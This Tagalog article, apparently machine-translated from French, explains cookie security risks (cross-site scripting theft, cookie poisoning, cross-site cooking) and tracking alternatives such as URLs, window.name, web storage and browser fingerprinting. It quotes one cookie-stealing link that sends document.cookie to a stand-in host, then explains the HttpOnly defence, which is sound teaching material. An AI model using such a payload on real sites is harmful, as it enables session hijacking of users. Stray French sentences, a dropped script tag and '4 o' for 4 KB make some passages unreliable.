Pag-script sa site: isang cookie na dapat lamang palitan sa pagitan ng server at ng kliyente ay ipinadala sa isa pang third party.

Ang isa pang paraan para magnakaw ng cookies ay ang pag-script ng mga site at ang browser mismo ay magpadala ng cookies sa mga nakakahamak na server na hindi kailanman nakakatanggap ng mga ito. Pinapayagan ng mga modernong browser ang pagpapatupad ng mga hinahangad na bahagi ng code mula sa server. Kung ang cookies ay na-access sa panahon ng runtime, ang kanilang mga halaga ay maaaring ipaalam sa ilang paraan sa mga server na hindi dapat ma-access ang mga ito. Ang pag-encrypt ng cookies bago ipadala ang mga ito sa network ay hindi nakakatulong na hadlangan ang pag-atake.

Ang ganitong uri ng in-site na scripting ay karaniwang ginagamit ng mga umaatake sa mga site na nagpapahintulot sa mga user na mag-post ng HTML na nilalaman. Sa pamamagitan ng pagsasama ng isang bahagi ng compatible na code sa HTML na kontribusyon, maaaring makatanggap ang isang attacker ng cookies mula sa ibang mga user. Ang kaalaman sa cookies na ito ay maaaring gamitin sa pamamagitan ng pagkonekta sa parehong site gamit ang ninakaw na cookies, sa gayon ay kinikilala bilang user na ang cookies ay ninakaw.

Ang isang paraan upang maiwasan ang mga naturang pag-atake ay ang paggamit ng HttpOnly flag; ito ay isang opsyon, na ipinakilala mula noong bersyon 6 ng Internet Explorer sa PHP mula noong bersyon 5.2.0 na binalak na gawing hindi naa-access ang cookie sa kliyente malapit sa script. Gayunpaman, dapat itong isaalang-alang ng mga web developer sa kanilang pag-develop ng site upang sila ay immune sa scripting sa site.

Ang isa pang banta sa seguridad na ginamit ay ang paggawa ng demand sa site.

Ang opisyal na teknikal na detalye ay nagpapahintulot sa cookies na maibalik lamang sa mga server sa domain kung saan sila nagmula. Gayunpaman, ang halaga ng cookies ay maaaring ipadala sa ibang mga server gamit ang mga paraan maliban sa mga header ng cookie.

Sa partikular, ang mga wika ng scripting tulad ng JavaScript ay karaniwang pinapayagang ma-access ang mga halaga ng cookie at may kakayahang magpadala ng mga arbitrary na halaga sa anumang server sa Internet. Ang kakayahan sa pag-script na ito ay ginagamit mula sa mga website na nagpapahintulot sa mga user na mag-post ng nilalamang HTML para makita ng ibang mga user.

Halimbawa, ang isang umaatake na tumatakbo sa example.com na domain ay maaaring mag-post ng komentong naglalaman ng sumusunod na link na tumuturo sa isang sikat na blog na kung hindi man ay hindi nila kontrolado:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Kapag nag-click ang isa pang user sa link na ito, ipapatupad ng browser ang onclick attribute na bahagi ng code, kaya pinapalitan nito ang document.cookie string ng listahan ng cookies ng user na aktibo para sa page na ito. Samakatuwid, ang listahan ng cookies na ito ay ipinadala sa example.com server, at samakatuwid ang umaatake ay maaaring mangolekta ng cookies ng user na ito.

Ang ganitong uri ng pag-atake ay mahirap matukoy sa panig ng gumagamit dahil ang script ay nagmula sa parehong domain na nagtakda ng cookie, at ang pagpapatakbo upang ipadala ang mga halaga ay lumilitaw na pinahintulutan ng domain na iyon. Itinuturing na responsibilidad ng mga administrator na nagpapatakbo ng ganitong uri ng site na maglagay ng mga paghihigpit na pumipigil sa paglalathala ng malisyosong code.

Ang cookies ay hindi direktang nakikita ng mga client-side program tulad ng JavaScript kung ipinadala ang mga ito gamit ang HttpOnly na flag. Mula sa punto ng view ng server, ang pagkakaiba lamang ay na sa linya ng Set-Cookie header ay may idinagdag na bagong field na naglalaman ng string na HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Kapag nakatanggap ang browser ng ganoong cookie, dapat itong gamitin nang normal sa sumusunod na HTTP exchange, ngunit hindi ito nakikita ng mga script na naisakatuparan sa panig ng kliyente. Ang bandila ng HttpOnly ay hindi bahagi ng anumang opisyal na teknikal na detalye, at hindi ipinapatupad sa lahat ng mga browser. Tandaan na kasalukuyang walang paraan upang pigilan ang pagbabasa at pagsulat ng session cookies sa pamamagitan ng XMLHTTPRequest na paraan.

Pagbabago ng nilalaman: ang isang umaatake ay nagpapadala ng isang di-wastong cookie sa isang server, na posibleng ginawa mula sa isang wastong cookie na ipinadala ng server.

Pagpapalit ng cookies

Sa sandaling kailangang maimbak ang cookies at ibalik nang hindi nabago sa server, maaaring baguhin ng isang attacker ang halaga ng cookies bago ibalik ang mga ito sa server. Halimbawa, kung ang isang cookie ay naglalaman ng kabuuang halaga na kailangang bayaran ng user para sa mga item na inilagay sa shopping cart ng tindahan, ang pagbabago sa halagang ito ay naglalantad sa server sa panganib na singilin ang umaatake nang mas mababa kaysa sa panimulang presyo. Ang proseso ng pagbabago ng halaga ng cookies ay tinatawag pagkalason sa cookie at maaaring gamitin pagkatapos ng pagnanakaw ng cookie upang gawin ang pag-atake na paulit-ulit.

Sa paraan ng pag-override ng cookie, sinasamantala ng umaatake ang isang glitch ng browser upang magpadala ng di-wastong cookie sa server.

Karamihan sa mga website, gayunpaman, ay nag-iimbak lamang ng isang session ID — isang random na nabuong natatanging numero na ginamit upang makilala ang gumagamit ng session — sa mismong cookie, habang ang lahat ng iba pang impormasyon ay naka-imbak sa server. Sa kasong ito, ang problemang ito ay higit na nalutas.

Paghawak ng cookie sa pagitan ng mga website

Ang bawat site ay inaasahang magkaroon ng sarili nitong cookies, kaya ang isang site ay hindi dapat magbago o gumawa ng cookies na nauugnay sa isa pang site. Ang isang kakulangan sa seguridad ng web browser ay maaaring magpapahintulot sa mga nakakahamak na site na labagin ang panuntunang ito. Ang pagsasamantala sa naturang kapintasan ay karaniwang tinutukoy bilang cross-site na pagluluto. Ang layunin ng naturang mga pag-atake ay maaaring pagnanakaw ng session ID.

Dapat gamitin ng mga user ang pinakabagong bersyon ng mga web browser kung saan halos naaalis ang mga kahinaang ito.

Magkasalungat na estado sa pagitan ng kliyente at server

Ang paggamit ng cookies ay maaaring makabuo ng kontradiksyon sa pagitan ng estado ng kliyente at ng estado na nakaimbak sa cookie. Kung ang user ay nakakuha ng cookie at nag-click sa "Balik" na button ng browser, ang estado ng browser ay karaniwang hindi katulad ng bago ang pagkuha na ito. Halimbawa, kung ang basket ng isang online na tindahan ay ginawa gamit ang cookies, hindi mababago ang mga nilalaman ng basket kapag bumalik ang user sa history ng browser: kung pinindot ng user ang isang button upang magdagdag ng artikulo sa kanyang basket at mag-click sa "Return " button, nananatili ang artikulo sa isang ito. Maaaring hindi ito ang intensyon ng user, na tiyak na gustong kanselahin ang pagdaragdag ng artikulo. Maaari itong humantong sa hindi pagiging maaasahan, pagkalito, at mga bug. Kaya dapat malaman ng mga web developer ang problemang ito at magpatupad ng mga hakbang upang mahawakan ang mga sitwasyong tulad nito.

Pag-expire ng cookie

Ang patuloy na cookies ay binatikos ng mga eksperto sa seguridad sa privacy dahil sa hindi nakatakdang mag-expire sa lalong madaling panahon, sa gayon ay nagbibigay-daan sa mga website na subaybayan ang mga user at bumuo ng kanilang profile sa paglipas ng panahon. Ang aspetong ito ng cookies ay bahagi rin ng problema sa pag-hijack ng session, dahil ang isang ninakaw na patuloy na cookie ay maaaring gamitin upang magpanggap bilang isang user sa loob ng mahabang panahon.

Basahin din: GAFAM: sino sila? Bakit sila (minsan) nakakatakot?

Mga alternatibo sa cookies

Ang ilang mga operasyon na maaaring isagawa gamit ang cookies ay maaari ding isagawa gamit ang iba pang mga mekanismo na lampasan ang cookies o muling likhain ang mga tinanggal na cookies, na lumilikha ng mga isyu sa privacy sa parehong paraan (o kung minsan ay mas malala dahil pagkatapos ay hindi nakikita) kaysa sa cookies.

IP address

Maaaring masubaybayan ang mga user gamit ang IP address ng computer na tumatawag sa pahina. Ang pamamaraan na ito ay magagamit mula noong pagpapakilala ng World Wide Web, habang ang mga pahina ay nai-download, ang server ay humihiling ng IP address ng computer na nagpapatakbo ng browser o proxy, kung walang ginagamit. Maaaring subaybayan ng server ang impormasyong ito kung mayroong ginagamit na cookies o wala. Gayunpaman, ang mga address na ito ay karaniwang hindi gaanong maaasahan sa pagtukoy ng isang user kaysa sa cookies dahil ang mga computer at proxy ay maaaring ibahagi ng maraming user, at ang parehong computer ay maaaring makatanggap ng ibang IP address sa bawat sesyon ng trabaho (gaya ng madalas na kaso para sa mga koneksyon sa telepono) .

Maaaring mapagkakatiwalaan ang pagsubaybay sa pamamagitan ng mga IP address sa ilang sitwasyon, gaya ng mga koneksyon sa broadband na nagpapanatili ng parehong IP address sa mahabang panahon, hangga't naka-on ang power.

Ang ilang mga system tulad ng Tor ay idinisenyo upang mapanatili ang pagiging hindi nagpapakilala sa Internet at gawing imposible o hindi praktikal ang pagsubaybay sa pamamagitan ng IP address.

URL

Ang isang mas tumpak na pamamaraan ay batay sa pag-embed ng impormasyon sa mga URL. Ang query string na bahagi ng URL ay isang pamamaraan na karaniwang ginagamit para sa layuning ito, ngunit ang ibang mga bahagi ay magagamit din. Parehong ginagamit ng Java serverlet at mga mekanismo ng session ng PHP ang paraang ito kung hindi pinagana ang cookies.

Kasama sa paraang ito ang web server na nagdaragdag ng mga kahilingan sa string sa mga link ng web page na nagdadala nito kapag ipinadala ito sa browser. Kapag sinundan ng user ang isang link, ibinabalik ng browser ang naka-attach na string ng query sa server.

Ang mga string ng query na ginamit para sa layuning ito at ang cookies ay halos magkapareho, na parehong impormasyon na arbitraryong pinili ng server at ibinalik ng browser. Gayunpaman, may ilang pagkakaiba: kapag ginamit muli ang URL na naglalaman ng string ng query, ipapadala ang parehong impormasyon sa server. Halimbawa, kung ang mga kagustuhan ng user ay naka-encode sa isang query string ng isang URL at ipinadala ng user ang URL na iyon sa isa pang user sa pamamagitan ng email, magagamit din ng user na iyon ang mga kagustuhang iyon.

Sa kabilang banda, kapag dalawang beses na na-access ng user ang parehong page, walang garantiya na parehong beses na gagamitin ang parehong string ng query. Halimbawa, kung ang isang user ay napunta sa isang pahina mula sa isang panloob na pahina ng site sa unang pagkakataon at napunta sa parehong pahina mula sa isang panlabas na pahina sa pangalawang pagkakataon, ang query string na nauugnay sa pahina ng site ay karaniwang naiiba, habang ang mga cookies ay pareho. .

Ang iba pang mga disadvantage ng mga string ng query ay nauugnay sa seguridad: ang pagpapanatili ng data na tumutukoy sa isang session sa mga string ng query ay nagbibigay-daan o nagpapasimple sa mga pag-atake sa pag-aayos ng session, mga pag-atake sa sangguniang pantukoy, at iba pang mga pagsasamantala. Ang pagpasa ng mga session ID bilang HTTP cookies ay mas secure.

Field ng nakatagong form

Isang paraan ng pagsubaybay sa session, na ginagamit ng ASP.NET, ay ang paggamit ng mga web form na may mga nakatagong field. Ang diskarteng ito ay halos kapareho sa paggamit ng mga string ng query ng URL upang magdala ng impormasyon at may parehong mga pakinabang at disadvantages; at kung ang form ay naproseso gamit ang pamamaraang HTTP GET, ang mga field ay talagang magiging bahagi ng URL ng browser na magpapadala nito kapag nagsusumite ng form. Ngunit karamihan sa mga form ay pinoproseso gamit ang HTTP POST, na nagiging sanhi ng pagdaragdag ng impormasyon ng form, kabilang ang mga nakatagong field, bilang karagdagang input na hindi bahagi ng URL o cookie.

Ang diskarte na ito ay may dalawang pakinabang mula sa isang pananaw sa pagsubaybay: una, ang pagsubaybay sa impormasyong inilagay sa HTML source code at POST input sa halip na ang URL ay magbibigay-daan sa karaniwang user na maiwasan ang pagsubaybay na ito; pangalawa, ang impormasyon ng session ay hindi kinokopya kapag kinopya ng user ang URL (para i-save ang page sa disk o ipadala ito sa pamamagitan ng email, halimbawa).

window.pangalan

Ang lahat ng karaniwang web browser ay maaaring mag-imbak ng medyo malaking halaga ng data (2MB hanggang 32MB) sa pamamagitan ng JavaScript gamit ang window.name property ng DOM. Maaaring gamitin ang data na ito sa halip na cookies ng session at ginagamit din sa mga domain. Ang pamamaraan ay maaaring isama sa mga bagay na JSON upang mag-imbak ng isang kumplikadong hanay ng mga variable ng session sa panig ng kliyente.

Ang downside ay ang bawat hiwalay na window o tab ay magkakaroon ng walang laman na window.name; kapag nagba-browse sa pamamagitan ng mga tab (binuksan ng user) nangangahulugan ito na ang mga tab na binuksan nang paisa-isa ay hindi magkakaroon ng pangalan ng window. Bukod pa rito, magagamit ang window.name upang subaybayan ang mga bisita sa iba't ibang site na maaaring magdulot ng isyu sa privacy.

Sa ilang mga aspeto maaari itong maging mas ligtas kaysa sa cookies, dahil sa hindi pagkakasangkot ng server, kaya ginagawa itong hindi maaapektuhan sa pag-atake ng network ng sniffer cookies. Gayunpaman, kung ang mga espesyal na hakbang ay ginawa upang protektahan ang data, ito ay mahina sa karagdagang pag-atake, dahil ang data ay magagamit sa pamamagitan ng iba pang mga site na binuksan sa parehong window.

HTTP authentication

Kasama sa HTTP protocol ang mga pangunahing protocol ng pagpapatunay ng access at ang digest ng pagpapatunay ng access, na nagbibigay-daan sa pag-access sa isang web page lamang kapag ibinigay ng user ang username at password. okay pass. Kung humiling ang server ng isang sertipiko upang magbigay ng access sa isang web page, hihilingin ito ng browser mula sa user at kapag nakuha na, iniimbak ito ng browser at ipinapadala ito sa lahat ng kasunod na kahilingan sa HTTP. Maaaring gamitin ang impormasyong ito upang subaybayan ang gumagamit.

Lokal na nakabahaging bagay

Kung ang isang browser ay may kasamang Adobe Flash Player plugin, ang mga lokal na ibinahaging bagay maaaring gamitin para sa parehong layunin tulad ng cookies. Maaari silang maging isang kaakit-akit na pagpipilian para sa mga web developer dahil:

• ang default na limitasyon sa laki para sa isang lokal na nakabahaging bagay ay 100 KB;
• Ang mga pagsusuri sa seguridad ay hiwalay sa mga pagsusuri ng cookie ng gumagamit (kaya maaaring payagan ang mga lokal na nakabahaging bagay kapag hindi ang cookies).

Ang huling puntong ito, na nagpapakilala sa patakaran sa pamamahala ng cookie mula sa mga lokal na nakabahaging bagay ng Adobe nagtataas ng mga tanong patungkol sa pamamahala ng gumagamit ng kanyang mga setting ng privacy: dapat niyang malaman na ang kanyang pamamahala ng cookies ay walang epekto sa pamamahala ng mga lokal na nakabahaging bagay, at kabaliktaran.

Ang isa pang pagpuna sa sistemang ito ay magagamit lamang ito sa pamamagitan ng Adobe Flash Player plugin na pagmamay-ari at hindi pamantayan sa web.

Pagtitiyaga sa panig ng kliyente

Sinusuportahan ng ilang web browser ang isang script-based na mekanismo ng pagtitiyaga, na nagpapahintulot sa page na mag-imbak ng impormasyon nang lokal para magamit sa ibang pagkakataon. Ang Internet Explorer, halimbawa, ay sumusuporta sa patuloy na impormasyon sa kasaysayan ng browser, mga bookmark, sa isang format na nakaimbak sa XML, o direkta sa isang web page na naka-save sa disk. Para sa Microsoft Internet Explorer 5, mayroong paraan ng user–data na available sa pamamagitan ng mga gawi ng DHTML.

Ipinakilala ng W3C sa HTML 5 ang isang bagong JavaScript API para sa client-side data storage na tinatawag na Web storage at naglalayong permanenteng palitan ang cookies. Ito ay katulad ng cookies ngunit may lubos na pinabuting kapasidad at walang pag-iimbak ng impormasyon sa header ng mga kahilingan sa HTTP. Ang API ay nagbibigay-daan sa dalawang uri ng web storage: localstorage at sessionstorage, katulad ng patuloy na cookies at session cookies (maliban sa session cookies na mag-e-expire kapag ang browser ay sarado habang imbakan ng session mag-e-expire kapag ang tab ay sarado), ayon sa pagkakabanggit. Ang web storage ay sinusuportahan ng Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 at Opera 10.50.

Karaniwang umaasa ang ibang mekanismo sa pag-cache ng browser (sa memorya sa halip na pag-refresh) gamit ang mga programang JavaScript sa mga web page. 

Halimbawa, maaaring maglaman ng tag ang isang page . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Sa puntong ito, ang programa ay nananatili sa cache memory at ang binisita na pahina ay hindi na-reload sa pangalawang pagkakataon. Dahil dito, kung ang program ay naglalaman ng isang pandaigdigang variable (halimbawa var id = 3243242;), ang identifier na ito ay mananatiling wasto at maaaring samantalahin ng ibang JavaScript code sa sandaling ma-load muli ang page, o kapag na-load ang isang page na nagli-link sa program. 

Ang pangunahing kawalan ng pamamaraang ito ay ang JavaScript global variable ay dapat na static, ibig sabihin ay hindi ito maaaring baguhin o tanggalin tulad ng isang cookie.

fingerprint sa web browser

Ang fingerprint ng browser ay impormasyong nakolekta tungkol sa mga setting ng configuration ng isang browser para sa mga layunin ng pagkakakilanlan. Maaaring gamitin ang mga fingerprint na ito upang ganap o bahagyang makilala ang isang user ng Internet o isang device kahit na hindi pinagana ang cookies.

Ang pangunahing impormasyon sa configuration ng web browser ay matagal nang kinokolekta ng mga serbisyo ng audience ng website para sa layunin ng tumpak na pagsukat ng trapiko ng tao sa web at pag-detect ng iba't ibang anyo ng pandaraya sa pag-click. Sa tulong ng mga client-side scripting language, mas tumpak ang pangangalap ng impormasyon posible na ngayon.

Ang pag-convert ng impormasyong ito sa isang bit string ay gumagawa ng fingerprint ng device. Noong 2010, sinukat ng Electronic Frontier Foundation (EFF) ang entropy ng fingerprint ng browser na hindi bababa sa 18,1 bit, at iyon ay bago ang mga pagsulong sa canvas fingerprinting ay nagdagdag ng 5,7 bits sa entropy na iyon.

Cookies sa maikling salita

Ang mga cookies ay maliliit na text file na iniimbak ng web browser sa hard drive ng isang bisita sa website at ginagamit (kabilang sa iba pang mga bagay) upang magtala ng impormasyon tungkol sa bisita o ang kanilang paglalakbay sa site. Sa gayon ay makikilala ng webmaster ang mga gawi ng isang bisita at isapersonal ang pagtatanghal ng kanyang site para sa bawat bisita; ginagawang posible ng cookies na matandaan kung gaano karaming mga artikulo ang ipapakita sa home page o kahit na panatilihin ang mga kredensyal sa pag-log in para sa anumang pribadong partido: kapag bumalik ang bisita sa site, hindi na kailangan para sa kanya na i-type ang kanyang pangalan at password upang makikilala, dahil awtomatiko silang nababasa sa cookie.

Ang isang cookie ay may limitadong habang-buhay, na itinakda ng taga-disenyo ng site. Maaari din silang mag-expire sa pagtatapos ng session sa site, na tumutugma sa pagsasara ng browser. Ang cookies ay malawakang ginagamit upang gawing mas madali ang buhay para sa mga bisita at ipakita sa kanila ang mas may-katuturang impormasyon. Ngunit ginagawang posible ng mga espesyal na diskarte na sundan ang isang bisita sa ilang mga site at sa gayon ay mangolekta at mag-cross-check ng napakalawak na impormasyon sa kanyang mga gawi. Ang pamamaraang ito ay nagbigay ng reputasyon sa paggamit ng cookies bilang isang diskarte sa pagsubaybay na lumalabag sa privacy ng mga bisita, na sa kasamaang-palad ay tumutugma sa katotohanan sa maraming kaso ng paggamit para sa mga hindi teknikal na dahilan o hindi paggalang sa mga inaasahan ng user. .

Bilang tugon sa mga lehitimong takot na ito, ipinakilala ng HTML 5 ang isang bagong JavaScript API para sa imbakan ng data sa panig ng kliyente na tinatawag na Web storage, na mas secure at may mas malaking kapasidad, na naglalayong palitan ang cookies.

Imbakan ng cookies

Sa ilang mga browser, ang isang cookie ay madaling ma-edit, isang simpleng text editor tulad ng Notepad ay sapat na upang baguhin ang mga halaga nito nang manu-mano.

Ang mga cookies ay nai-save nang iba depende sa browser:

• Microsoft Internet Explorer sine-save ang bawat cookie sa ibang file;
• Mozilla Firefox sine-save ang lahat ng cookies nito sa isang file;
• Opera i-save ang lahat ng cookies nito sa isang file at i-encrypt ang mga ito (imposibleng baguhin ang mga ito maliban sa mga pagpipilian sa software);
• Apple Safari sine-save ang lahat ng cookies nito sa iisang .plist extension file. Posible ang pagbabago ngunit hindi napakadali, maliban kung dadaan ka sa mga opsyon sa software.

Ang mga browser ay kinakailangan upang suportahan Ang pinakamababa :

• 300 sabay-sabay na cookies;
• 4 o bawat cookie;
• 20 cookies bawat host o domain.